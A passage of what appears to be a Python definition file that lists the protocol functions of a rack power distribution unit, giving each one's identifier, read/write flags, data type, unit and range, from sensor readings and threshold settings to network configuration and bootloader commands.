func.description = "Current true RMS"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[7] = func
func.guid = 7
func.name = "Power"
func.description = "Real Power"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[8] = func
func.guid = 8
func.name = "StatePortCur"
func.description = "current port state"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[9] = func
func.guid = 9
func.name = "ActiveEnergy"
func.description = "Active Energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10] = func
func.guid = 10
func.name = "ApparentEnergy"
func.description = "Apparent Energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[11] = func
func.guid = 11
func.name = "Temperature"
func.description = "Temperature"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[12] = func
func.guid = 12
func.name = "Humidity"
func.description = "Humidity"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[13] = func
func.guid = 13
func.name = "FanSpeed"
func.description = "Fanspeed in Rounds per minute"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "rpm"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5000] = func
func.guid = 5000
func.name = "MaxCurrent"
func.description = "Maximum port current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5001] = func
func.guid = 5001
func.name = "MaxPower"
func.description = "Maximum port power occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5002] = func
func.guid = 5002
func.name = "MaxTotalCurrent"
func.description = "Maximum total current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5003] = func
func.guid = 5003
func.name = "MaxTotalPower"
func.description = "Maximum total power occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 8
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[5004] = func
func.guid = 5004
func.name = "MaxVoltage"
func.description = "Maximum voltage occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5005] = func
func.guid = 5005
func.name = "MinVoltage"
func.description = "Minimum voltage occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5006] = func
func.guid = 5006
func.name = "MinTemperature"
func.description = "Minimum temperature occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[5007] = func
func.guid = 5007
func.name = "MaxTemperature"
func.description = "Maximum temperature occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[5008] = func
func.guid = 5008
func.name = "MinHumidity"
func.description = "Minimum humidity occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5009] = func
func.guid = 5009
func.name = "MaxHumidity"
func.description = "Maximum humidity occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10000] = func
func.guid = 10000
func.name = "Address"
func.description = "Identification of the module"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10001] = func
func.guid = 10001
func.name = "ModuleName"
func.description = "Module name"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10002] = func
func.guid = 10002
func.name = "FirmwareVersion"
func.description = "Firmware version"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_VERSION"
func.valDef.size = 4
func = Functions()
functions[10003] = func
func.guid = 10003
func.name = "HardwareVersion"
func.description = "Hardware version"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_VERSION"
func.valDef.size = 4
func = Functions()
functions[10004] = func
func.guid = 10004
func.name = "FirmwareID"
func.description = "Identification of the firmware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 8
func = Functions()
functions[10005] = func
func.guid = 10005
func.name = "HardwareID"
func.description = "Identification of the hardware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 8
func = Functions()
functions[10006] = func
func.guid = 10006
func.name = "RackName"
func.description = "Rack Name"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10007] = func
func.guid = 10007
func.name = "RackPosition"
func.description = "Position of the Energy Switch in the rack"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10008] = func
func.guid = 10008
func.name = "AdminLogin"
func.description = "Admin Login"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10009] = func
func.guid = 10009
func.name = "AdminPassword"
func.description = "Admin Password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10010] = func
func.guid = 10010
func.name = "TemperatureUnitSelector"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10011] = func
func.guid = 10011
func.name = "IPAddress"
func.description = "IP-address"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10012] = func
func.guid = 10012
func.name = "SubNetMask"
func.description = "Subnetmask"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SUBNETMASK"
func.valDef.size = 4
func = Functions()
functions[10013] = func
func.guid = 10013
func.name = "StdGateWay"
func.description = "Standard gateway IP"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10014] = func
func.guid = 10014
func.name = "DnsServer"
func.description = "Dns server IP"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10015] = func
func.guid = 10015
func.name = "MAC"
func.description = "MAC address"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_MAC"
func.valDef.size = 6
func = Functions()
functions[10016] = func
func.guid = 10016
func.name = "DHCPEnable"
func.description = "DHCP enable"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10017] = func
func.guid = 10017
func.name = "NTPServer"
func.description = "NTP server IP"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10018] = func
func.guid = 10018
func.name = "UseDefaultNTPServer"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10019] = func
func.guid = 10019
func.name = "UseNTP"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10020] = func
func.guid = 10020
func.name = "SNMPTrapRecvIP"
func.description = "SNMP trap server IP-address"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10021] = func
func.guid = 10021
func.name = "SNMPTrapRecvPort"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10022] = func
func.guid = 10022
func.name = "SNMPCommunityRead"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10023] = func
func.guid = 10023
func.name = "SNMPCommunityWrite"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10024] = func
func.guid = 10024
func.name = "SNMPControl"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10025] = func
func.guid = 10025
func.name = "TelnetCLIPort"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10026] = func
func.guid = 10026
func.name = "TelnetUARTMUXPort"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10027] = func
func.guid = 10027
func.name = "SelectUARTMUCChannel"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10028] = func
func.guid = 10028
func.name = "LDAPServer"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10029] = func
func.guid = 10029
func.name = "UseLDAPServer"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10030] = func
func.guid = 10030
func.name = "Beeper"
func.description = "Beeper control enable beeper for n seconds"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "s"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10031] = func
func.guid = 10031
func.name = "DisplayLock"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10032] = func
func.guid = 10032
func.name = "DisplayTimeOn"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "min"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10033] = func
func.guid = 10033
func.name = "DisplayRotation"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10034] = func
func.guid = 10034
func.name = "PortName"
func.description = "Name of the port"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10035] = func
func.guid = 10035
func.name = "PortState"
func.description = (
"The state of the port, only used to set the port state, see current port state to get the port state"
)
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10036] = func
func.guid = 10036
func.name = "CurrentPriorOff"
func.description = "Priority level switch off when maximum total current exceeds threshold"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "1H8L"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10037] = func
func.guid = 10037
func.name = "DelayOn"
func.description = "Port activation delay after power recycle"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "s"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10038] = func
func.guid = 10038
func.name = "MaxCurrentOff"
func.description = "Maximum port current switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10039] = func
func.guid = 10039
func.name = "MaxCurrentWarning"
func.description = "Maximum port current warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10040] = func
func.guid = 10040
func.name = "MaxPowerOff"
func.description = "Maximum port power switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10041] = func
func.guid = 10041
func.name = "MaxPowerWarning"
func.description = "Maximum port power warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10042] = func
func.guid = 10042
func.name = "MaxTotalCurrentOff"
func.description = "Maximum total current switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10043] = func
func.guid = 10043
func.name = "MaxTotalCurrentWarning"
func.description = "Maximum total current warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10044] = func
func.guid = 10044
func.name = "MaxTotalPowerOff"
func.description = "Maximum total power switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10045] = func
func.guid = 10045
func.name = "MaxTotalPowerWarning"
func.description = "Maximum total power warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10046] = func
func.guid = 10046
func.name = "MaxVoltageOff"
func.description = "Maximum voltage switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10047] = func
func.guid = 10047
func.name = "MaxVoltageWarning"
func.description = "Maximum voltage warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10048] = func
func.guid = 10048
func.name = "MinVoltageOff"
func.description = "Minimum voltage switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10049] = func
func.guid = 10049
func.name = "MinVoltageWarning"
func.description = "Minimum voltage warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10050] = func
func.guid = 10050
func.name = "ActiveEnergyReset"
func.description = "Active Energy"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10051] = func
func.guid = 10051
func.name = "ApparentEnergyReset"
func.description = "Apparent Energy"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10052] = func
func.guid = 10052
func.name = "MinTemperatureWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[10053] = func
func.guid = 10053
func.name = "MaxTemperatureWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[10054] = func
func.guid = 10054
func.name = "MinHumidityWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10055] = func
func.guid = 10055
func.name = "MaxHumidityWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10056] = func
func.guid = 10056
func.name = "LedStatus"
func.description = "To set Status of a led"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10057] = func
func.guid = 10057
func.name = "MatrixDisplayStatus"
func.description = "To set Status of a small matrix display"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10058] = func
func.guid = 10058
func.name = "Baudrate"
func.description = "To set baudrate for circular buffers"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10059] = func
func.guid = 10059
func.name = "P_PID"
func.description = "Proportional value of PID"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10060] = func
func.guid = 10060
func.name = "I_PID"
func.description = "Integral value of PID"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10061] = func
func.guid = 10061
func.name = "D_PID"
func.description = "Derivative value of PID"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10062] = func
func.guid = 10062
func.name = "WeightOfTempsensor"
func.description = "Gives the weight of a tempsensor to the input of a PID controller"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10063] = func
func.guid = 10063
func.name = "TargetTemp"
func.description = "Temperature to be set for PID controller"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[10064] = func
func.guid = 10064
func.name = "MaximumPWM"
func.description = "Maximum value of pwm to control ventilators"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10065] = func
func.guid = 10065
func.name = "MinimumPWM"
func.description = "Minimum value of pwm to control ventilators"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10066] = func
func.guid = 10066
func.name = "Startuptime"
func.description = ""
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "s"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[40000] = func
func.guid = 40000
func.name = "JumpBoot"
func.description = "Enter bootloader mode. Normally this command is only sent to application program. When the bootloader is already running, this command will only reply a positive acknowledge."
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 0
func = Functions()
functions[40001] = func
func.guid = 40001
func.name = "GotoAddressmode"
func.description = "Addressing mode on/off"
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40002] = func
func.guid = 40002
func.name = "GotoFactoryMode"
func.description = ""
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 16
func = Functions()
functions[40003] = func
func.guid = 40003
func.name = "DoSnapshot"
func.description = ""
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40004] = func
func.guid = 40004
func.name = "SampleChannelTime"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40005] = func
func.guid = 40005
func.name = "SampleChannelFFT"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40006] = func
func.guid = 40006
func.name = "FlushCallibData"
func.description = ""
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40007] = func
func.guid = 40007
func.name = "ModNum"
func.description = (
"To retrieve the number of modules connected to the device. The device itself is treated as module 0."
)
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[40008] = func
func.guid = 40008
func.name = "ModInfo"
func.description = "To retrieve module information"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 26
func = Functions()
functions[40009] = func
func.guid = 40009
func.name = "ApplyIPSettings"
func.description = ""
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[50000] = func
func.guid = 50000
func.name = "Monitor"
func.description = "Get the monitor values"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_POINTER"
func = Functions()
functions[50001] = func
func.guid = 50001
func.name = "Parameter"
func.description = "get all parameters"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_POINTER"
func = Functions()
functions[50002] = func
func.guid = 50002
func.name = "CircularReadBuffer"
func.description = "Read from slave(application connected to rs232) to master or from master to application"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_CIRCULAR_BUFFER"
func.valDef.size = 1
func = Functions()
functions[50003] = func
func.guid = 50003
func.name = "CircularWriteBuffer"
func.description = "Write of data from application to master or from master to slave(application connected to rs232)"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_CIRCULAR_BUFFER"
func.valDef.size = 1
func = Functions()
functions[50004] = func
func.guid = 50004
func.name = "VoltageTimeSamples"
func.description = "Get the voltage samples in oscilloscope view mode"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50005] = func
func.guid = 50005
func.name = "CurrentTimeSamples"
func.description = "Get the current samples in oscilloscope view mode"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50006] = func
func.guid = 50006
func.name = "VoltageFreqSamples"
func.description = "Get the frequency analyse of the voltage"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50007] = func
func.guid = 50007
func.name = "CurrentFreqSamples"
func.description = "Get the frequency analyse of the current"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50008] = func
func.guid = 50008
func.name = "Eeprom"
func.description = "read or write eeprom data"
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50009] = func
func.guid = 50009
func.name = "CallibrationValues"
func.description = ""
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 2
func = Functions()
functions[60000] = func
func.guid = 60000
func.name = "BootReadID"
func.description = "Get the identification of the microcontroller. The response contains the values stored at memory address 0xFF0000 and 0xFF00002. (8 bytes in total)"
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[60001] = func
func.guid = 60001
func.name = "BootJumpApp"
func.description = "Jump to the application, which starts at 0x4000. "
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 0
